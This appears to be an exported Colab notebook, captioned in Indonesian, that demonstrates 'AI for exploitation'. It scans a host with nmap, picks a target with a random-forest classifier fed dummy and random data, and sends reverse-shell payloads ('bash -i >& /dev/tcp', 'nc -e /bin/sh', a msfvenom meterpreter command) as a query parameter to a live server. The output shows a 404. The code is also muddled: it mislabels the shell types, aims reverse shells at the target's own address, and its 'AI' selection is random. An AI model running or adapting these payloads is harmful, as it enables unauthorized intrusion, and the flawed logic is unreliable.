<a href="https://colab.research.google.com/github/elangbijak4/Security_Research/blob/main/Tool17_Almudaya_Ai_for_Exploit.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

Kode ini mendemonstrasikan penerapan AI dalam kode eksplotasi

In [ ]:
!sudo apt-get update
!sudo apt-get install -y nmap

In [4]:
!pip install python-nmap

     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 44.4/44.4 kB 1.3 MB/s eta 0:00:00
  Preparing metadata (setup.py) ... done
  Created wheel for python-nmap: filename=python_nmap-0.7.1-py2.py3-none-any.whl size=20635 sha256=4f166a33be228b5e15c562b73276edab6319cdf80d3b494bb9cd778e07195e3b
  Stored in directory: /root/.cache/pip/wheels/da/bd/c6/0342ac886d4deb8d166a3191eb2566f738c5b1574cb0a8cd62
Successfully built python-nmap


In [5]:
import nmap
import requests
import random
from sklearn.ensemble import RandomForestClassifier
import numpy as np

In [6]:
class NetworkScanner:
    def __init__(self):
        self.nm = nmap.PortScanner()

    def scan(self, target):
        self.nm.scan(target, '80,443,445,21,22,23,25,110,143,3306,3389')
        return self.nm.all_hosts()

In [7]:
class Exploit:
    def __init__(self, target, port, payload_type):
        self.target = target
        self.port = port
        self.payload_type = payload_type

    def create_payload(self):
        if self.payload_type == "bind_shell":
            payload = "bash -i >& /dev/tcp/{}/{} 0>&1".format(self.target, self.port)
        elif self.payload_type == "reverse_shell":
            payload = "nc -e /bin/sh {} {}".format(self.target, self.port)
        elif self.payload_type == "meterpreter":
            payload = "msfvenom -p windows/meterpreter/reverse_tcp LHOST={} LPORT={} -f exe > meterpreter.exe".format(self.target, self.port)
        else:
            payload = "uname -a"
        return payload

    def send_payload(self, payload):
        try:
            url = f"http://{self.target}:{self.port}/vulnerable_path"
            params = {"input": payload}
            response = requests.get(url, params=params)
            print("Payload sent successfully")
            print("Response:")
            print(response.text)
        except Exception as e:
            print(f"Failed to send payload: {e}")

In [8]:
def select_target(hosts):
    # Dummy model for illustration purposes
    X = np.array([[1, 80], [0, 443], [1, 445], [0, 21], [1, 22]])
    y = np.array([1, 0, 1, 0, 1])  # 1 indicates vulnerability, 0 indicates not vulnerable

    model = RandomForestClassifier()
    model.fit(X, y)

    target_features = np.array([[1 if random.choice([True, False]) else 0 for _ in range(2)] for _ in hosts])
    predictions = model.predict(target_features)

    # Select the most vulnerable target
    for i, host in enumerate(hosts):
        if predictions[i] == 1:
            return host
    return None

In [9]:
if __name__ == "__main__":
    # Step 1: Scan network
    scanner = NetworkScanner()
    target = 'scanme.nmap.org'
    hosts = scanner.scan(target)
    print(f"Hosts found: {hosts}")

    # Step 2: Select target using AI
    target_host = select_target(hosts)
    if target_host:
        target_port = 80  # Example port for HTTP
        payload_type = 'reverse_shell'  # Example payload type
        exploit = Exploit(target_host, target_port, payload_type)
        payload = exploit.create_payload()
        exploit.send_payload(payload)
    else:
        print("No vulnerable targets found.")

Hosts found: ['45.33.32.156']
Payload sent successfully
Response:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /vulnerable_path was not found on this server.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at 45.33.32.156 Port 80</address>
</body></html>

